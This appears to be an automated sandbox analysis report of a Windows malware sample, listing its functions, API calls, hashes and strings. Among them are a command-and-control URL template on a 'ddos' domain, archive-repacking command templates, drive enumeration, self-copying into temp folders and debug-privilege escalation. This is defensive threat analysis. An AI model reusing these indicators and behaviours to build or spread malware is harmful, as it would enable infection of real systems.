String ID: HG$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-862939041
Opcode ID: 52838ad02f3d3684acdc1ac60867a9503078163852d33214e946a09c458c09dc
Instruction ID: 67d177a77e3920164d047b1e383be57d67b3f90b29b733ca3d49d95a6409f6f2
Opcode Fuzzy Hash: 52838ad02f3d3684acdc1ac60867a9503078163852d33214e946a09c458c09dc
Instruction Fuzzy Hash: D301217150039DBFE7306F729CC8E2BBBACEB447A9F004669F645B7190D6705E888B60

Function 00EE2B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00EE2BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00EE2BB4
GetDriveTypeA.KERNELBASE(?), ref: 00EE2BD3
CreateThread.KERNELBASE(00000000,00000000,00EE2B7D,?,00000000,00000000), ref: 00EE2BEE
lstrlen.KERNEL32(?), ref: 00EE2BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00EE2C16
CreateThread.KERNELBASE(00000000,00000000,00EE2845,00000000,00000000,00000000), ref: 00EE2C3A

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: 0388f991db73b3f90053796527c79c8963826046afdd2211a791de722404a885
Instruction ID: e0970a8ce86c5f7d38cda9fe45c2ec000f0225e59c069367af35924a9afe2c1d
Opcode Fuzzy Hash: 0388f991db73b3f90053796527c79c8963826046afdd2211a791de722404a885
Instruction Fuzzy Hash: 2421E7B18001CCAFE7209F669CC4DAE7B6DFB04348B14012DFA42B7161D7348E0ACB61

Function 00EE2C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00EE2C57

Part of subcall function 00EE1973: PathFileExistsA.KERNELBASE(\N,00000000,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00EE1992
Part of subcall function 00EE1973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00EE19BA
Part of subcall function 00EE1973: Sleep.KERNEL32(00000064), ref: 00EE19C6
Part of subcall function 00EE1973: wsprintfA.USER32 ref: 00EE19EC
Part of subcall function 00EE1973: CopyFileA.KERNEL32(?,?,00000000), ref: 00EE1A00
Part of subcall function 00EE1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE1A1E
Part of subcall function 00EE1973: GetFileSize.KERNEL32(?,00000000), ref: 00EE1A2C
Part of subcall function 00EE1973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00EE1A46
Part of subcall function 00EE1973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00EE1A65

CreateThread.KERNELBASE(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00EE2C99
WaitForMultipleObjects.KERNEL32(00000001,00EE16BA,00000001,000000FF,?,00EE16BA,00000000), ref: 00EE2CAC
VirtualFree.KERNELBASE(012D0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\IXDaI.exe,00EE4E5C,00EE4E60,?,00EE16BA,00000000), ref: 00EE2CC2

Strings

C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00EE2C69

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe
API String ID: 2042498389-699841801
Opcode ID: 5cf99474c7eb5f674150a6ca58983bb050b6b0124f4598cfcf90f3fde4c0cac8
Instruction ID: 8d59ae4a61dca96dca1f93bdcea47b86adb26fbf84f134b343c146a3e3e2aae3
Opcode Fuzzy Hash: 5cf99474c7eb5f674150a6ca58983bb050b6b0124f4598cfcf90f3fde4c0cac8
Instruction Fuzzy Hash: 2101B1B16012AC7FD6109BA7EC4EEAB7E9CEF41B20F204014B605BA1D1D6A09A04C3A0

Function 00EE2845 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EE274A: memset.MSVCRT ref: 00EE2766
Part of subcall function 00EE274A: memset.MSVCRT ref: 00EE2774
Part of subcall function 00EE274A: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00EE2787
Part of subcall function 00EE274A: wsprintfA.USER32 ref: 00EE27AB
Part of subcall function 00EE274A: wsprintfA.USER32 ref: 00EE27C6
Part of subcall function 00EE274A: CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\480c1388.exe,00000000), ref: 00EE27D4
Part of subcall function 00EE274A: wsprintfA.USER32 ref: 00EE27F4
Part of subcall function 00EE274A: DeleteFileA.KERNEL32(?,?,00EE4E54,00EE4E58), ref: 00EE281A
Part of subcall function 00EE274A: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00EE4E54,00EE4E58), ref: 00EE2832

DeleteFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\480c1388.exe), ref: 00EE287D
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00EE2894
CloseHandle.KERNEL32(FFFFFFFF), ref: 00EE28A5

Part of subcall function 00EE2692: CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,774CE800,?,?,00EE29DB,?,00000001), ref: 00EE26A7
Part of subcall function 00EE2692: WaitForSingleObject.KERNEL32(00000000,000000FF,774CE800,?,?,00EE29DB,?,00000001), ref: 00EE26B5
Part of subcall function 00EE2692: lstrlen.KERNEL32(?), ref: 00EE26C4
Part of subcall function 00EE2692: ??2@YAPAXI@Z.MSVCRT ref: 00EE26CE
Part of subcall function 00EE2692: lstrcpy.KERNEL32(00000004,?), ref: 00EE26E3
Part of subcall function 00EE2692: SetEvent.KERNEL32 ref: 00EE273C

Strings

C:\Users\user\AppData\Local\Temp\480c1388.exe, xrefs: 00EE2878

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: File$wsprintf$CreateDeleteEventmemset$??2@CloseCopyFolderFreeHandleObjectPathSingleSpecialVirtualWaitlstrcpylstrlen
String ID: C:\Users\user\AppData\Local\Temp\480c1388.exe
API String ID: 2533558932-4059347755
Opcode ID: 977395aa11ff83ee3c39dbd944b9eb64c10a45e10c1da078c2bc462ebecf4973
Instruction ID: 975c5bc501f107f0a74e59bad13c2379a2e5f03cb56125e1e3cb22eef2869c95
Opcode Fuzzy Hash: 977395aa11ff83ee3c39dbd944b9eb64c10a45e10c1da078c2bc462ebecf4973
Instruction Fuzzy Hash: 64F054B464038C5FD724AF77AC8EB59339C7B10705F101565B716FB0E0DBB8D5488A55

Function 00EE14E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00EE1504
VirtualQuery.KERNEL32(00EE14E1,?,0000001C), ref: 00EE1525
ExitProcess.KERNEL32 ref: 00EE157A

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 39934e79a92eb674749e86414edc08344ed7d85112497b6005a6a0653bc6b27d
Instruction ID: 711bd117af6e493f6a06890a02cca8daeba8648304f8cc7a6d4dcc52a4ebe3f4
Opcode Fuzzy Hash: 39934e79a92eb674749e86414edc08344ed7d85112497b6005a6a0653bc6b27d
Instruction Fuzzy Hash: 64115AB1D0028CDFCB21DFA7ACC4A7D77A8EBC8754B10506AF402FA190D27089899B51

Non-executed Functions

Function 00EE119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,?,?,00EE13EF), ref: 00EE11AB
OpenProcessToken.ADVAPI32(00000000,00000028,00EE13EF,?,?,?,?,?,?,00EE13EF), ref: 00EE11BB
AdjustTokenPrivileges.ADVAPI32(00EE13EF,00000000,?,00000010,00000000,00000000), ref: 00EE11EB
CloseHandle.KERNEL32(00EE13EF), ref: 00EE11FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00EE13EF), ref: 00EE1203

Strings

C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00EE11A5

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe
API String ID: 75692138-699841801
Opcode ID: 2c9311795e9ddec96c5c1831ce32acf8e58b9d38e1620de04f1c880c77a7fb94
Instruction ID: 508759efb46a0e4278208e5a5389e03bdc913d9106ee4b8d7ec9141cae11a7cc
Opcode Fuzzy Hash: 2c9311795e9ddec96c5c1831ce32acf8e58b9d38e1620de04f1c880c77a7fb94
Instruction Fuzzy Hash: B30100B190024CFFDB10DFE5D989AAEBBB9FB08304F1045A9F606A6250D7709E889B50

Function 00EE239D Relevance: 58.0, APIs: 26, Strings: 7, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 00EE23CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00EE2464
GetFileSize.KERNEL32(00000000,00000000), ref: 00EE2472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 00EE24A8
memset.MSVCRT ref: 00EE24B9
strrchr.MSVCRT ref: 00EE24C9
wsprintfA.USER32 ref: 00EE24DE
strrchr.MSVCRT ref: 00EE24ED
memset.MSVCRT ref: 00EE24F2
memset.MSVCRT ref: 00EE2505
wsprintfA.USER32 ref: 00EE2524
Sleep.KERNEL32(000007D0), ref: 00EE2535
Sleep.KERNEL32(000007D0), ref: 00EE255D
memset.MSVCRT ref: 00EE256E
wsprintfA.USER32 ref: 00EE2585
memset.MSVCRT ref: 00EE25A6
wsprintfA.USER32 ref: 00EE25CA
Sleep.KERNEL32(000007D0), ref: 00EE25D0
Sleep.KERNEL32(000007D0,?,?), ref: 00EE25E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00EE25FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00EE2611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00EE2642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00EE265B
SetEndOfFile.KERNEL32 ref: 00EE266D
CloseHandle.KERNEL32(00000000), ref: 00EE2676
RemoveDirectoryA.KERNEL32(?), ref: 00EE2681

Strings

C:\Users\user\AppData\Local\Temp\480c1388.exe, xrefs: 00EE2519, 00EE25BF
%s X -ibck "%s" "%s\", xrefs: 00EE251E
%s%s, xrefs: 00EE24D8
%s\, xrefs: 00EE257F
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 00EE25C4
-ibck, xrefs: 00EE25BA
C:\Users\user\AppData\Local\Temp\, xrefs: 00EE23B1, 00EE23B6, 00EE24CD

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\480c1388.exe
API String ID: 2203340711-2545203059
Opcode ID: 5eb11990e49b23f2c9dc090b0ce74257c20a977db5d21361b5b4d4483ee7e2a8
Instruction ID: 3d1c8375ec8a9f89f42ba6b7fbc6bb7981bc3ec2b623f34a07fe4dafe3f3f2d3
Opcode Fuzzy Hash: 5eb11990e49b23f2c9dc090b0ce74257c20a977db5d21361b5b4d4483ee7e2a8
Instruction Fuzzy Hash: 1E81A2B1504389AFD710DF62DC89EABB7ECEB88704F00091DF645B71A0D7749A498B66

Function 00EE120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00EE1400), ref: 00EE1226
GetProcAddress.KERNEL32(00000000), ref: 00EE122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00EE1400), ref: 00EE123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00EE1400), ref: 00EE1250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,00EE1400), ref: 00EE129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,00EE1400), ref: 00EE12B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,00EE1400), ref: 00EE12F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00EE1400), ref: 00EE130A

Strings

ntdll.dll, xrefs: 00EE1219
ZwQuerySystemInformation, xrefs: 00EE1212
C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00EE1262

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-3489788173
Opcode ID: b35786e70baeb3ead714bc179d849b5307b37bde2ab1867b98c73a7cbbc90013
Instruction ID: bd538df2fb6993de8232526a7fc77478d5a5524639f7efe01985dee75ed43a34
Opcode Fuzzy Hash: b35786e70baeb3ead714bc179d849b5307b37bde2ab1867b98c73a7cbbc90013
Instruction Fuzzy Hash: 9A2125306053D9ABD7209B67DC48B6FBAA8FB89B04F100958F645FB250C370DA84D7A5

Function 00EE189D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00EE18B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,774D0F00,77068400), ref: 00EE18D3
CloseHandle.KERNEL32(I%), ref: 00EE18E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EE18F0
GetExitCodeProcess.KERNEL32(?,?), ref: 00EE1901
CloseHandle.KERNEL32(?), ref: 00EE190A

Strings

I%, xrefs: 00EE18E0

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID: I%
API String ID: 876959470-1881045234
Opcode ID: 6f3c5be9940572d8a37d10be9a9947709671188b33d718ff54148446519a1f80
Instruction ID: 3f704840d63bc00b5529793875eed4a5f43c86b2ff8efb16084e8c943c66c7fd
Opcode Fuzzy Hash: 6f3c5be9940572d8a37d10be9a9947709671188b33d718ff54148446519a1f80
Instruction Fuzzy Hash: D4015E7290116CBBCB21ABA6DC48DEFBF7DEB85720F104125FA15B61A0D6714A58CAA0

Function 00EE2692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,774CE800,?,?,00EE29DB,?,00000001), ref: 00EE26A7
WaitForSingleObject.KERNEL32(00000000,000000FF,774CE800,?,?,00EE29DB,?,00000001), ref: 00EE26B5
lstrlen.KERNEL32(?), ref: 00EE26C4
??2@YAPAXI@Z.MSVCRT ref: 00EE26CE
lstrcpy.KERNEL32(00000004,?), ref: 00EE26E3
lstrcpy.KERNEL32(?,00000004), ref: 00EE271F
??3@YAXPAX@Z.MSVCRT ref: 00EE272D
SetEvent.KERNEL32 ref: 00EE273C

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: 84403d12388d534cd2e79402af084127d6f39dffba42ac66a6eb49dc04f9407e
Instruction ID: ff4467c1b081f17e6f1160f25e89bd511cb6cee35f668559eb26ab0901d2d9b7
Opcode Fuzzy Hash: 84403d12388d534cd2e79402af084127d6f39dffba42ac66a6eb49dc04f9407e
Instruction Fuzzy Hash: 771190B550029CEFCB219F27EC8886A7BAEFB84720710401AF954BF160D7708D89DB90

Function 00EE1B8A Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00EE1BCD
rand.MSVCRT ref: 00EE1BD8
memset.MSVCRT ref: 00EE1C43
memcpy.MSVCRT ref: 00EE1C4F
lstrcat.KERNEL32(?,.exe), ref: 00EE1C5D

Strings

.exe, xrefs: 00EE1C57

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe
API String ID: 122620767-4119554291
Opcode ID: 77d8dc252feccd93360325806825b18f0536fc90f1b0e2a9de99198526396f6b
Instruction ID: 400647bc465f109c926c831c93f49e8cadf27d8b31089a9f86a11f34855b24b1
Opcode Fuzzy Hash: 77d8dc252feccd93360325806825b18f0536fc90f1b0e2a9de99198526396f6b
Instruction Fuzzy Hash: B0219B72E042DCAED3251337AC84B6A7B849FE3725F2510D9F5913F1E2D27409C98261

Function 00EE139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00EE13BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00EE13DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00EE1448

Part of subcall function 00EE119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,?,?,00EE13EF), ref: 00EE11AB
Part of subcall function 00EE119F: OpenProcessToken.ADVAPI32(00000000,00000028,00EE13EF,?,?,?,?,?,?,00EE13EF), ref: 00EE11BB
Part of subcall function 00EE119F: AdjustTokenPrivileges.ADVAPI32(00EE13EF,00000000,?,00000010,00000000,00000000), ref: 00EE11EB
Part of subcall function 00EE119F: CloseHandle.KERNEL32(00EE13EF), ref: 00EE11FA
Part of subcall function 00EE119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00EE13EF), ref: 00EE1203

Strings

SeDebugPrivilege, xrefs: 00EE13D3
C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00EE13A8

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe$SeDebugPrivilege
API String ID: 4123949106-3534422503
Opcode ID: d8c36b65456c27bd87989c9d3690c2e20f3a68a17ba9a51b173c31de8af8e93a
Instruction ID: 330c12855a4511834841d46bb7574ab85707bf6fb1a6e93a28718051ed088aa0
Opcode Fuzzy Hash: d8c36b65456c27bd87989c9d3690c2e20f3a68a17ba9a51b173c31de8af8e93a
Instruction Fuzzy Hash: 34313F71E0028DEADF20DBA78C45FEEBBB9EB44704F2051A9E515B7281D7709E85CB60

Function 00EE1319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00EE1334
GetProcAddress.KERNEL32(00000000), ref: 00EE133B
memset.MSVCRT ref: 00EE1359

Strings

ntdll.dll, xrefs: 00EE132F
NtSystemDebugControl, xrefs: 00EE132A

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: 70b764407224bc7b20def9bd33653ca540d4b14f92237ce847d996444f7b5eaa
Instruction ID: 4cadf7108263f384d91ffae2a644b1c28fc6f7b8cdd81e5a919ae8f875666b02
Opcode Fuzzy Hash: 70b764407224bc7b20def9bd33653ca540d4b14f92237ce847d996444f7b5eaa
Instruction Fuzzy Hash: CA01617160138DEFDB10DFA6ECC996FBBA8FB41318F0045AAF901B6181D3718645CA51

Function 00EE1DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00EE1E0B
lstrcpy.KERNEL32(?,00000001), ref: 00EE1E1C
strrchr.MSVCRT ref: 00EE1E2B
lstrcmpiA.KERNEL32(?,00EE4488), ref: 00EE1E48
lstrlen.KERNEL32(00EE4488), ref: 00EE1E53

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 55853a4b870bae9fdfec7759bcfa638aba0103b6d5c64c623a53a5e5281637b3
Instruction ID: fc0ef535b8d1ff9c3a2b26a0043c0d646ce380ac0503324650d8abd930171a1d
Opcode Fuzzy Hash: 55853a4b870bae9fdfec7759bcfa638aba0103b6d5c64c623a53a5e5281637b3
Instruction Fuzzy Hash: 1001DBB290429D6FDB105771EC49BD6779CDB04355F0400A5F945F70D0D6749EC88B90

Function 00EE185B Relevance: 7.5, APIs: 5, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00EE1F92,00000000,?,00000000,?,?,?,00EE1F92,?,00000000,00000002), ref: 00EE1867
